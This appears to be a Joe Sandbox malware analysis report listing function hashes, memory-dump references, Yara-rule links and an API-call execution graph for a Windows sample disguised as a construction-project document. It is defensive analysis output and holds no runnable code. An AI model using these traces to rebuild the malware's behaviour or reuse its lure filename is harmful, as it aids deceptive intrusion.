                                                                                                                          • Instruction ID: b24004e2459b3715c883c1996b24246953ff0fb47fcdf85fedfa1614f6e92f62
                                                                                                                          • Opcode Fuzzy Hash: 9b416045f54723c0aced5ed7493083a206bc2f8aaa63c3fa24b1832e5229f487
                                                                                                                          • Instruction Fuzzy Hash: 60911270E00228DBDF28CF98C854BADBBB1FF44305F15816AD856BB291C7789996CF44
                                                                                                                          Function 0040692D Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d1d8e67d3672fe33e56554ed692c604aaa9ef945de69a5b70ae3e54f11edcfbe
                                                                                                                          • Instruction ID: 0c07c17b414ad8f17a3ff3e8587382d040bd297e960d91c66a6d9af6720fecf2
                                                                                                                          • Opcode Fuzzy Hash: d1d8e67d3672fe33e56554ed692c604aaa9ef945de69a5b70ae3e54f11edcfbe
                                                                                                                          • Instruction Fuzzy Hash: 38815571D00228DFDF24CFA8C844BADBBB1FB44305F25816AD456BB291C7389A96CF54
                                                                                                                          Function 00406432 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 16c3da451b00ed7501bdbc73778925f50314777a9f5d312f132e9d4e74f014bb
                                                                                                                          • Instruction ID: 40c7cf361161e00566e5adfab28d3a5c75941d24eb7bbcfefb24c15ac497d971
                                                                                                                          • Opcode Fuzzy Hash: 16c3da451b00ed7501bdbc73778925f50314777a9f5d312f132e9d4e74f014bb
                                                                                                                          • Instruction Fuzzy Hash: 91815571D04228DBDF28CFA8C844BADBBB1FB44345F21816AD856BB2C1C7785A96CF45
                                                                                                                          Function 00406880 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0cc07006cc7c9aef3fafa63e8afbe90e4e7d7e8d46648082bd87270dbbc6feb7
                                                                                                                          • Instruction ID: 456f5d8fd794945b55b5d9b3679d3b1ecbaa17202882ac546044f61b7aaf63b3
                                                                                                                          • Opcode Fuzzy Hash: 0cc07006cc7c9aef3fafa63e8afbe90e4e7d7e8d46648082bd87270dbbc6feb7
                                                                                                                          • Instruction Fuzzy Hash: 10711471D04228DFDF28CF98C844BADBBB1FB48305F15806AD856BB281D7389996DF54
                                                                                                                          Function 0040699E Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: eec15c9fa71d2bb8ac0e9ab2641b80d47be28fb4f34c6eac6740816efd5aae2a
                                                                                                                          • Instruction ID: 8bd2b1db5987d4e4b96b583130c6a33f56c1bdc1121660429b57e4b15e5e4dee
                                                                                                                          • Opcode Fuzzy Hash: eec15c9fa71d2bb8ac0e9ab2641b80d47be28fb4f34c6eac6740816efd5aae2a
                                                                                                                          • Instruction Fuzzy Hash: DD713471D04228DFDF28CF98C844BADBBB1FB48305F25806AD856BB291C7389996DF54
                                                                                                                          Function 004068EA Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9b7cba6587137bac62e94bd95232145a4a4e4cea60c39cf1103777a64c0d5ae0
                                                                                                                          • Instruction ID: b46b7f647ddddaa837b295bcbfdf8fe32b4b15f5abab45eff4fbfa9538c7bc71
                                                                                                                          • Opcode Fuzzy Hash: 9b7cba6587137bac62e94bd95232145a4a4e4cea60c39cf1103777a64c0d5ae0
                                                                                                                          • Instruction Fuzzy Hash: E7712371D04228DFEF28CF98C844BADBBB1FB44305F25806AD856BB291C7789A56DF44
                                                                                                                          Function 00405B5D Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B6D
                                                                                                                          • lstrcmpiA.KERNEL32(00405D97,00000000), ref: 00405B85
                                                                                                                          • CharNextA.USER32(00405D97,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B96
                                                                                                                          • lstrlenA.KERNEL32(00405D97,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B9F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 190613189-0
                                                                                                                          • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                          • Instruction ID: 495cf0b23cfe7cb5471ae9193bfc392c37a901cc734ec181b4002dd8df2403ac
                                                                                                                          • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                          • Instruction Fuzzy Hash: 56F0CD32604458AFC7129FA8CD00D9EBBB8EF06250B2140AAF801F7221D634FE019BA9

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:6.2%
                                                                                                                          Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                          Signature Coverage:3.2%
                                                                                                                          Total number of Nodes:2000
                                                                                                                          Total number of Limit Nodes:67
                                                                                                                          execution_graph 37502 44dea5 37503 44deb5 FreeLibrary 37502->37503 37504 44dec3 37502->37504 37503->37504 40136 4147f3 40139 414561 40136->40139 40138 414813 40140 41456d 40139->40140 40141 41457f GetPrivateProfileIntW 40139->40141 40144 4143f1 memset _itow WritePrivateProfileStringW 40140->40144 40141->40138 40143 41457a 40143->40138 40144->40143 37505 4287c1 37506 4287d2 37505->37506 37507 429ac1 37505->37507 37509 428818 37506->37509 37510 42881f 37506->37510 37525 425711 37506->37525 37519 425ad6 37507->37519 37575 415c56 11 API calls 37507->37575 37542 42013a 37509->37542 37570 420244 97 API calls 37510->37570 37513 4260dd 37569 424251 120 API calls 37513->37569 37517 4259da 37568 416760 11 API calls 37517->37568 37522 429a4d 37523 429a66 37522->37523 37524 429a9b 37522->37524 37571 415c56 11 API calls 37523->37571 37537 429a96 37524->37537 37573 416760 11 API calls 37524->37573 37525->37507 37525->37517 37525->37522 37526 422aeb memset memcpy memcpy 37525->37526 37529 4260a1 37525->37529 37538 4259c2 37525->37538 37541 425a38 37525->37541 37558 4227f0 memset memcpy 37525->37558 37559 422b84 15 API calls 37525->37559 37560 422b5d memset memcpy memcpy 37525->37560 37561 422640 13 API calls 37525->37561 37563 4241fc 11 API calls 37525->37563 37564 42413a 90 API calls 37525->37564 37526->37525 37567 415c56 11 API calls 37529->37567 37532 429a7a 37572 416760 11 API calls 37532->37572 37574 424251 120 API calls 37537->37574 37538->37519 37562 415c56 11 API calls 37538->37562 37541->37538 37565 422640 13 API calls 37541->37565 37566 4226e0 12 API calls 37541->37566 37543 42014c 37542->37543 37546 420151 37542->37546 37585 41e466 97 API calls 37543->37585 37545 420162 37545->37525 37546->37545 37547 4201b3 37546->37547 37548 420229 37546->37548 37549 4201b8 37547->37549 37550 4201dc 37547->37550 37548->37545 37551 41fd5e 86 API calls 37548->37551 37576 41fbdb 37549->37576 37550->37545 37554 4201ff 37550->37554 37582 41fc4c 37550->37582 37551->37545 37554->37545 37557 42013a 97 API calls 37554->37557 37557->37545 37558->37525 37559->37525 37560->37525 37561->37525 37562->37517 37563->37525 37564->37525 37565->37541 37566->37541 37567->37517 37568->37513 37569->37519 37570->37525 37571->37532 37572->37537 37573->37537 37574->37507 37575->37517 37577 41fbf8 37576->37577 37579 41fbf1 37576->37579 37590 41ee26 37577->37590 37581 41fc39 37579->37581 37600 4446ce 11 API calls 37579->37600 37581->37545 37586 41fd5e 37581->37586 37583 41ee6b 86 API calls 37582->37583 37584 41fc5d 37583->37584 37584->37550 37585->37546 37588 41fd65 37586->37588 37587 41fdab 37587->37545 37588->37587 37589 41fbdb 86 API calls 37588->37589 37589->37588 37591 41ee41 37590->37591 37592 41ee32 37590->37592 37601 41edad 37591->37601 37604 4446ce 11 API calls 37592->37604 37595 41ee3c 37595->37579 37598 41ee58 37598->37595 37606 41ee6b 37598->37606 37600->37581 37610 41be52 37601->37610 37604->37595 37605 41eb85 11 API calls 37605->37598 37607 41ee70 37606->37607 37608 41ee78 37606->37608 37666 41bf99 86 API calls 37607->37666 37608->37595 37611 41be6f 37610->37611 37612 41be5f 37610->37612 37616 41be8c 37611->37616 37631 418c63 37611->37631 37645 4446ce 11 API calls 37612->37645 37615 41be69 37615->37595 37615->37605 37616->37615 37618 41bf3a 37616->37618 37619 41bed1 37616->37619 37627 41bee7 37616->37627 37648 4446ce 11 API calls 37618->37648 37621 41bef0 37619->37621 37623 41bee2 37619->37623 37622 41bf01 37621->37622 37621->37627 37624 41bf24 memset 37622->37624 37626 41bf14 37622->37626 37646 418a6d memset memcpy memset 37622->37646 37635 41ac13 37623->37635 37624->37615 37647 41a223 memset memcpy memset 37626->37647 37627->37615 37649 41a453 86 API calls 37627->37649 37630 41bf20 37630->37624 37634 418c72 37631->37634 37632 418c94 37632->37616 37633 418d51 memset memset 37633->37632 37634->37632 37634->37633 37636 41ac52 37635->37636 37637 41ac3f memset 37635->37637 37639 41ac6a 37636->37639 37650 41dc14 19 API calls 37636->37650 37642 41acd9 37637->37642 37641 41aca1 37639->37641 37651 41519d 37639->37651 37641->37642 37643 41acc0 memset 37641->37643 37644 41accd memcpy 37641->37644 37642->37627 37643->37642 37644->37642 37645->37615 37646->37626 37647->37630 37648->37627 37650->37639 37654 4175ed 37651->37654 37662 417570 SetFilePointer 37654->37662 37657 41760a ReadFile 37658 417637 37657->37658 37659 417627 GetLastError 37657->37659 37660 4151b3 37658->37660 37661 41763e memset 37658->37661 37659->37660 37660->37641 37661->37660 37663 41759c GetLastError 37662->37663 37665 4175b2 37662->37665 37664 4175a8 GetLastError 37663->37664 37663->37665 37664->37665 37665->37657 37665->37660 37666->37608 40145 44def7 40146 44df07 40145->40146 40147 44df00 ??3@YAXPAX 40145->40147 40148 44df17 40146->40148 40149 44df10 ??3@YAXPAX 40146->40149 40147->40146 40150 44df27 40148->40150 40151 44df20 ??3@YAXPAX 40148->40151 40149->40148 40152 44df37 40150->40152 40153 44df30 ??3@YAXPAX 40150->40153 40151->40150 40153->40152 37667 417bc5 37668 417c61 37667->37668 37673 417bda 37667->37673 37669 417bf6 UnmapViewOfFile CloseHandle 37669->37669 37669->37673 37671 417c2c 37671->37673 37679 41851e 20 API calls 37671->37679 37673->37668 37673->37669 37673->37671 37674 4175b7 37673->37674 37675 4175d6 CloseHandle 37674->37675 37676 4175c8 37675->37676 37677 4175df 37675->37677 37676->37677 37678 4175ce Sleep 37676->37678 37677->37673 37678->37675 37679->37671 37680 4152c7 malloc 37681 4152ef 37680->37681 37683 4152e2 37680->37683 37684 416760 11 API calls 37681->37684 37684->37683 40154 4148b6 FindResourceW 40155 4148cf SizeofResource 40154->40155 40158 4148f9 40154->40158 40156 4148e0 LoadResource 40155->40156 40155->40158 40157 4148ee LockResource 40156->40157 40156->40158 40157->40158 40159 441b3f 40169 43a9f6 40159->40169 40161 441b61 40342 4386af memset 40161->40342 40163 44189a 40164 442bd4 40163->40164 40165 4418e2 40163->40165 40166 4418ea 40164->40166 40344 441409 memset 40164->40344 40165->40166 40343 4414a9 12 API calls 40165->40343 40170 43aa20 40169->40170 40171 43aadf 40169->40171 40170->40171 40172 43aa34 memset 40170->40172 40171->40161 40173 43aa56 40172->40173 40174 43aa4d 40172->40174 40345 43a6e7 40173->40345 40353 42c02e memset 40174->40353 40179 43aad3 40355 4169a7 11 API calls 40179->40355 40180 43aaae 40180->40171 40180->40179 40195 43aae5 40180->40195 40182 43ac18 40184 43ac47 40182->40184 40357 42bbd5 memcpy memcpy memcpy memset memcpy 40182->40357 40185 43aca8 40184->40185 40358 438eed 16 API calls 40184->40358 40189 43acd5 40185->40189 40360 4233ae 11 API calls 40185->40360 40188 43ac87 40359 4233c5 16 API calls 40188->40359 40361 423426 11 API calls 40189->40361 40193 43ace1 40362 439811 170 API calls 40193->40362 40194 43a9f6 168 API calls 40194->40195 40195->40171 40195->40182 40195->40194 40356 439bbb 22 API calls 40195->40356 40197 43acfd 40203 43ad2c 40197->40203 40363 438eed 16 API calls 40197->40363 40199 43ad19 40364 4233c5 16 API calls 40199->40364 40200 43ad58 40365 44081d 170 API calls 40200->40365 40203->40200 40205 43add9 40203->40205 40205->40205 40369 423426 11 API calls 40205->40369 40206 43ae3a memset 40207 43ae73 40206->40207 40370 42e1c0 154 API calls 40207->40370 40208 43adab 40367 438c4e 170 API calls 40208->40367 40210 43ad6c 40210->40171 40210->40208 40366 42370b memset memcpy memset 40210->40366 40212 43ae96 40371 42e1c0 154 API calls 40212->40371 40214 43adcc 40368 440f84 12 API calls 40214->40368 40217 43aea8 40218 43aec1 40217->40218 40372 42e199 154 API calls 40217->40372 40220 43af00 40218->40220 40373 42e1c0 154 API calls 40218->40373 40220->40171 40223 43af1a 40220->40223 40224 43b3d9 40220->40224 40374 438eed 16 API calls 40223->40374 40229 43b3f6 40224->40229 40236 43b4c8 40224->40236 40226 43b60f 40226->40171 40433 4393a5 17 API calls 40226->40433 40227 43af2f 40375 4233c5 16 API calls 40227->40375 40415 432878 12 API calls 40229->40415 40231 43af51 40376 423426 11 API calls 40231->40376 40234 43af7d 40377 423426 11 API calls 40234->40377 40235 43b4f2 40422 43a76c 21 API calls 40235->40422 40236->40235 40421 42bbd5 memcpy memcpy memcpy memset memcpy 40236->40421 40240 43b529 40423 44081d 170 API calls 40240->40423 40241 43af94 40378 423330 11 API calls 40241->40378 40245 43b47e 40249 43b497 40245->40249 40418 42374a memcpy memset memcpy memcpy memcpy 40245->40418 40246 43b544 40250 43b55c 40246->40250 40424 42c02e memset 40246->40424 40247 43b428 40268 43b462 40247->40268 40416 432b60 16 API calls 40247->40416 40248 43afca 40379 423330 11 API calls 40248->40379 40419 4233ae 11 API calls 40249->40419 40425 43a87a 170 API calls 40250->40425 40255 43afdb 40380 4233ae 11 API calls 40255->40380 40257 43b4b1 40420 423399 11 API calls 40257->40420 40259 43b56c 40269 43b58a 40259->40269 40426 423330 11 API calls 40259->40426 40261 43afee 40381 44081d 170 API calls 40261->40381 40263 43b4c1 40429 42db80 170 API calls 40263->40429 40267 43b592 40428 43a82f 16 API calls 40267->40428 40417 423330 11 API calls 40268->40417 40427 440f84 12 API calls 40269->40427 40272 43b5b4 40430 438c4e 170 API calls 40272->40430 40274 43b5cf 40431 42c02e memset 40274->40431 40276 43b005 40276->40171 40279 43b01f 40276->40279 40382 42d836 170 API calls 40276->40382 40277 43b1ef 40392 4233c5 16 API calls 40277->40392 40279->40277 40390 423330 11 API calls 40279->40390 40391 42d71d 170 API calls 40279->40391 40280 43b212 40393 423330 11 API calls 40280->40393 40283 43add4 40283->40226 40432 438f86 16 API calls 40283->40432 40286 43b087 40383 4233ae 11 API calls 40286->40383 40287 43b22a 40394 42ccb5 11 API calls 40287->40394 40290 43b10f 40386 423330 11 API calls 40290->40386 40291 43b23f 40395 4233ae 11 API calls 40291->40395 40293 43b257 40396 4233ae 11 API calls 40293->40396 40297 43b26e 40397 4233ae 11 API calls 40297->40397 40298 43b129 40387 4233ae 11 API calls 40298->40387 40301 43b09a 40301->40290 40384 42cc15 19 API calls 40301->40384 40385 4233ae 11 API calls 40301->40385 40302 43b282 40398 43a87a 170 API calls 40302->40398 40304 43b13c 40388 440f84 12 API calls 40304->40388 40306 43b29d 40399 423330 11 API calls 40306->40399 40309 43b15f 40389 4233ae 11 API calls 40309->40389 40310 43b2af 40312 43b2b8 40310->40312 40313 43b2ce 40310->40313 40400 4233ae 11 API calls 40312->40400 40401 440f84 12 API calls 40313->40401 40316 43b2c9 40403 4233ae 11 API calls 40316->40403 40317 43b2da 40402 42370b memset memcpy memset 40317->40402 40320 43b2f9 40404 423330 11 API calls 40320->40404 40322 43b30b 40405 423330 11 API calls 40322->40405 40324 43b325 40406 423399 11 API calls 40324->40406 40326 43b332 40407 4233ae 11 API calls 40326->40407 40328 43b354 40408 423399 11 API calls 40328->40408 40330 43b364 40409 43a82f 16 API calls 40330->40409 40332 43b370 40410 42db80 170 API calls 40332->40410 40334 43b380 40411 438c4e 170 API calls 40334->40411 40336 43b39e 40412 423399 11 API calls 40336->40412 40338 43b3ae 40413 43a76c 21 API calls 40338->40413 40340 43b3c3 40414 423399 11 API calls 40340->40414 40342->40163 40343->40166 40344->40164 40346 43a6f5 40345->40346 40347 43a765 40345->40347 40346->40347 40434 42a115 40346->40434 40347->40171 40354 4397fd memset 40347->40354 40351 43a73d 40351->40347 40352 42a115 154 API calls 40351->40352 40352->40347 40353->40173 40354->40180 40355->40171 40356->40195 40357->40184 40358->40188 40359->40185 40360->40189 40361->40193 40362->40197 40363->40199 40364->40203 40365->40210 40366->40208 40367->40214 40368->40283 40369->40206 40370->40212 40371->40217 40372->40218 40373->40218 40374->40227 40375->40231 40376->40234 40377->40241 40378->40248 40379->40255 40380->40261 40381->40276 40382->40286 40383->40301 40384->40301 40385->40301 40386->40298 40387->40304 40388->40309 40389->40279 40390->40279 40391->40279 40392->40280 40393->40287 40394->40291 40395->40293 40396->40297 40397->40302 40398->40306 40399->40310 40400->40316 40401->40317 40402->40316 40403->40320 40404->40322 40405->40324 40406->40326 40407->40328 40408->40330 40409->40332 40410->40334 40411->40336 40412->40338 40413->40340 40414->40283 40415->40247 40416->40268 40417->40245 40418->40249 40419->40257 40420->40263 40421->40235 40422->40240 40423->40246 40424->40250 40425->40259 40426->40269 40427->40267 40428->40263 40429->40272 40430->40274 40431->40283 40432->40226 40433->40171 40435 42a175 40434->40435 40437 42a122 40434->40437 40435->40347 40440 42b13b 154 API calls 40435->40440 40437->40435 40438 42a115 154 API calls 40437->40438 40441 43a174 40437->40441 40465 42a0a8 154 API calls 40437->40465 40438->40437 40440->40351 40455 43a196 40441->40455 40456 43a19e 40441->40456 40442 43a306 40442->40455 40478 4388c4 14 API calls 40442->40478 40445 42a115 154 API calls 40445->40456 40446 415a91 memset 40446->40456 40447 43a642 40447->40455 40482 4169a7 11 API calls 40447->40482 40449 4165ff 11 API calls 40449->40456 40451 43a635 40481 42c02e memset 40451->40481 40455->40437 40456->40442 40456->40445 40456->40446 40456->40449 40456->40455 40466 42ff8c 40456->40466 40474 439504 13 API calls 40456->40474 40475 4312d0 154 API calls 40456->40475 40476 42be4c memcpy memcpy memcpy memset memcpy 40456->40476 40477 43a121 11 API calls 40456->40477 40458 4169a7 11 API calls 40459 43a325 40458->40459 40459->40447 40459->40451 40459->40455 40459->40458 40460 42b5b5 memset memcpy 40459->40460 40461 42bf4c 14 API calls 40459->40461 40464 4165ff 11 API calls 40459->40464 40479 42b63e 14 API calls 40459->40479 40480 42bfcf memcpy 40459->40480 40460->40459 40461->40459 40464->40459 40465->40437 40467 43817e 146 API calls 40466->40467 40468 42ff99 40467->40468 40469 42ffe3 40468->40469 40470 42ffd0 40468->40470 40473 42ff9d 40468->40473 40484 4169a7 11 API calls 40469->40484 40483 4169a7 11 API calls 40470->40483 40473->40456 40474->40456 40475->40456 40476->40456 40477->40456 40478->40459 40479->40459 40480->40459 40481->40447 40482->40455 40483->40473 40484->40473 37685 41276d 37686 41277d 37685->37686 37728 4044a4 LoadLibraryW 37686->37728 37688 412785 37720 412789 37688->37720 37736 414b81 37688->37736 37691 4127c8 37742 412465 memset ??2@YAPAXI 37691->37742 37693 4127ea 37754 40ac21 37693->37754 37698 412813 37772 40dd07 memset 37698->37772 37699 412827 37777 40db69 memset 37699->37777 37702 412822 37798 4125b6 ??3@YAXPAX 37702->37798 37704 40ada2 _wcsicmp 37705 41283d 37704->37705 37705->37702 37708 412863 CoInitialize 37705->37708 37782 41268e 37705->37782 37802 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37708->37802 37712 41296f 37804 40b633 37712->37804 37714 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37719 412957 CoUninitialize 37714->37719 37725 4128ca 37714->37725 37719->37702 37721 4128d0 TranslateAcceleratorW 37722 412941 GetMessageW 37721->37722 37721->37725 37722->37719 37722->37721 37723 412909 IsDialogMessageW 37723->37722 37723->37725 37724 4128fd IsDialogMessageW 37724->37722 37724->37723 37725->37721 37725->37723 37725->37724 37726 41292b TranslateMessage DispatchMessageW 37725->37726 37727 41291f IsDialogMessageW 37725->37727 37726->37722 37727->37722 37727->37726 37729 4044f7 37728->37729 37730 4044cf GetProcAddress 37728->37730 37734 404507 MessageBoxW 37729->37734 37735 40451e 37729->37735 37731 4044e8 FreeLibrary 37730->37731 37732 4044df 37730->37732 37731->37729 37733 4044f3 37731->37733 37732->37731 37733->37729 37734->37688 37735->37688 37737 414b8a 37736->37737 37738 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37736->37738 37808 40a804 memset 37737->37808 37738->37691 37741 414b9e GetProcAddress 37741->37738 37743 4124e0 37742->37743 37744 412505 ??2@YAPAXI 37743->37744 37745 41251c 37744->37745 37747 412521 37744->37747 37830 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37745->37830 37819 444722 37747->37819 37753 41259b wcscpy 37753->37693 37835 40b1ab free free 37754->37835 37756 40ad76 37836 40aa04 37756->37836 37759 40a9ce malloc memcpy free free 37762 40ac5c 37759->37762 37760 40ad4b 37760->37756 37859 40a9ce 37760->37859 37762->37756 37762->37759 37762->37760 37763 40ace7 free 37762->37763 37839 40a8d0 37762->37839 37851 4099f4 37762->37851 37763->37762 37767 40a8d0 7 API calls 37767->37756 37768 40ada2 37769 40adc9 37768->37769 37770 40adaa 37768->37770 37769->37698 37769->37699 37770->37769 37771 40adb3 _wcsicmp 37770->37771 37771->37769 37771->37770 37864 40dce0 37772->37864 37774 40dd3a GetModuleHandleW 37869 40dba7 37774->37869 37778 40dce0 3 API calls 37777->37778 37779 40db99 37778->37779 37941 40dae1 37779->37941 37955 402f3a 37782->37955 37784 412766 37784->37702 37784->37708 37785 4126d3 _wcsicmp 37786 4126a8 37785->37786 37786->37784 37786->37785 37788 41270a 37786->37788 37989 4125f8 7 API calls 37786->37989 37788->37784 37958 411ac5 37788->37958 37799 4125da 37798->37799 37800 4125f0 37799->37800 37801 4125e6 DeleteObject 37799->37801 37803 40b1ab free free 37800->37803 37801->37800 37802->37714 37803->37712 37805 40b640 37804->37805 37806 40b639 free 37804->37806 37807 40b1ab free free 37805->37807 37806->37805 37807->37720 37809 40a83b GetSystemDirectoryW 37808->37809 37810 40a84c wcscpy 37808->37810 37809->37810 37815 409719 wcslen 37810->37815 37813 40a881 LoadLibraryW 37814 40a886 37813->37814 37814->37738 37814->37741 37816 409724 37815->37816 37817 409739 wcscat LoadLibraryW 37815->37817 37816->37817 37818 40972c wcscat 37816->37818 37817->37813 37817->37814 37818->37817 37820 444732 37819->37820 37821 444728 DeleteObject 37819->37821 37831 409cc3 37820->37831 37821->37820 37823 412551 37824 4010f9 37823->37824 37825 401130 37824->37825 37826 401134 GetModuleHandleW LoadIconW 37825->37826 37827 401107 wcsncat 37825->37827 37828 40a7be 37826->37828 37827->37825 37829 40a7d2 37828->37829 37829->37753 37829->37829 37830->37747 37834 409bfd memset wcscpy 37831->37834 37833 409cdb CreateFontIndirectW 37833->37823 37834->37833 37835->37762 37837 40aa14 37836->37837 37838 40aa0a free 37836->37838 37837->37768 37838->37837 37840 40a8eb 37839->37840 37841 40a8df wcslen 37839->37841 37842 40a906 free 37840->37842 37843 40a90f 37840->37843 37841->37840 37844 40a919 37842->37844 37845 4099f4 3 API calls 37843->37845 37846 40a932 37844->37846 37847 40a929 free 37844->37847 37845->37844 37849 4099f4 3 API calls 37846->37849 37848 40a93e memcpy 37847->37848 37848->37762 37850 40a93d 37849->37850 37850->37848 37852 409a41 37851->37852 37853 4099fb malloc 37851->37853 37852->37762 37855 409a37 37853->37855 37856 409a1c 37853->37856 37855->37762 37857 409a30 free 37856->37857 37858 409a20 memcpy 37856->37858 37857->37855 37858->37857 37860 40a9e7 37859->37860 37861 40a9dc free 37859->37861 37863 4099f4 3 API calls 